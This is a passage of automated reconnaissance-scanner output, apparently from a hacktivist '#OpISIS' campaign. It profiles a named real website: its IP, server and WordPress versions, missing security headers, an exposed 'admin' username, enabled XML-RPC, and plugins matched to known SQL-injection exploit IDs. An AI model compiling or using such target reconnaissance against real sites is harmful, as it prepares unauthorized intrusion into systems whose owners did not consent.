18219[INFO] Latest URLs hosted in this IP address detected by at least one URL scanner or malicious URL dataset:
18220[INFO] Latest files that are not detected by any antivirus solution and were downloaded by VirusTotal from the IP address provided:
18221[INFO] ------Alexa Rank SECTION------
18222[INFO] Percent of Visitors Rank in Country:
18223[INFO] Percent of Search Traffic:
18224[INFO] Percent of Unique Visits:
18225[INFO] Total Sites Linking In:
18226[*] Total Sites
18227[INFO] Useful links related to hizb-ut-tahrir.se - 93.191.156.197:
18228[*] https://www.virustotal.com/pt/ip-address/93.191.156.197/information/
18229[*] https://www.hybrid-analysis.com/search?host=93.191.156.197
18230[*] https://www.shodan.io/host/93.191.156.197
18231[*] https://www.senderbase.org/lookup/?search_string=93.191.156.197
18232[*] https://www.alienvault.com/open-threat-exchange/ip/93.191.156.197
18233[*] http://pastebin.com/search?q=93.191.156.197
18234[*] http://urlquery.net/search.php?q=93.191.156.197
18235[*] http://www.alexa.com/siteinfo/hizb-ut-tahrir.se
18236[*] http://www.google.com/safebrowsing/diagnostic?site=hizb-ut-tahrir.se
18237[*] https://censys.io/ipv4/93.191.156.197
18238[*] https://www.abuseipdb.com/check/93.191.156.197
18239[*] https://urlscan.io/search/#93.191.156.197
18240[*] https://github.com/search?q=93.191.156.197&type=Code
18241[INFO] Useful links related to AS48854 - 93.191.152.0/21:
18242[*] http://www.google.com/safebrowsing/diagnostic?site=AS:48854
18243[*] https://www.senderbase.org/lookup/?search_string=93.191.152.0/21
18244[*] http://bgp.he.net/AS48854
18245[*] https://stat.ripe.net/AS48854
18246[INFO] Date: 16/01/20 | Time: 19:23:21
18247[INFO] Total time: 2 minute(s) and 2 second(s)
18248######################################################################################################################################
18249[-] Target: http://hizb-ut-tahrir.se (93.191.156.197)
18250[M] Website Not in HTTPS: http://hizb-ut-tahrir.se
18251[I] Server: Apache
18252[I] X-Powered-By: PHP/5.6.40
18253[L] X-Frame-Options: Not Enforced
18254[I] Strict-Transport-Security: Not Enforced
18255[I] X-Content-Security-Policy: Not Enforced
18256[I] X-Content-Type-Options: Not Enforced
18257[L] Robots.txt Found: http://hizb-ut-tahrir.se/robots.txt
18258[I] CMS Detection: WordPress
18259[I] Wordpress Version: 5.3.2
18260[I] Wordpress Theme: flymag
18261[-] WordPress usernames identified:
18262[M] admin
18263[M] XML-RPC services are enabled
18264[I] Autocomplete Off Not Found: http://hizb-ut-tahrir.se/wp-login.php
18265[-] Default WordPress Files:
18266[I] http://hizb-ut-tahrir.se/license.txt
18267[I] http://hizb-ut-tahrir.se/readme.html
18268[I] http://hizb-ut-tahrir.se/wp-content/themes/twentyfifteen/genericons/COPYING.txt
18269[I] http://hizb-ut-tahrir.se/wp-content/themes/twentyfifteen/genericons/LICENSE.txt
18270[I] http://hizb-ut-tahrir.se/wp-content/themes/twentyfifteen/readme.txt
18271[I] http://hizb-ut-tahrir.se/wp-content/themes/twentynineteen/readme.txt
18272[I] http://hizb-ut-tahrir.se/wp-content/themes/twentytwenty/readme.txt
18273[I] http://hizb-ut-tahrir.se/wp-includes/ID3/license.commercial.txt
18274[I] http://hizb-ut-tahrir.se/wp-includes/ID3/license.txt
18275[I] http://hizb-ut-tahrir.se/wp-includes/ID3/readme.txt
18276[I] http://hizb-ut-tahrir.se/wp-includes/images/crystal/license.txt
18277[I] http://hizb-ut-tahrir.se/wp-includes/js/plupload/license.txt
18278[I] http://hizb-ut-tahrir.se/wp-includes/js/swfupload/license.txt
18279[I] http://hizb-ut-tahrir.se/wp-includes/js/tinymce/license.txt
18280[-] Searching Wordpress Plugins ...
18281[I] feed
18282[M] EDB-ID: 38624 "WordPress Plugin WP Feed - 'nid' SQL Injection"
18283[I] jetpack v7.1.1
18284[M] EDB-ID: 18126 "WordPress Plugin jetpack - 'sharedaddy.php' ID SQL Injection"
18285[I] lazy-load v0.6.1
18286[I] ultimate-faqs
18287[I] Checking for Directory Listing Enabled ...
18288[-] Date & Time: 16/01/2020 19:26:25
18289[-] Completed in: 0:08:11
18290#######################################################################################################################################
18291 Anonymous JTSEC #OpISIS Full Recon #34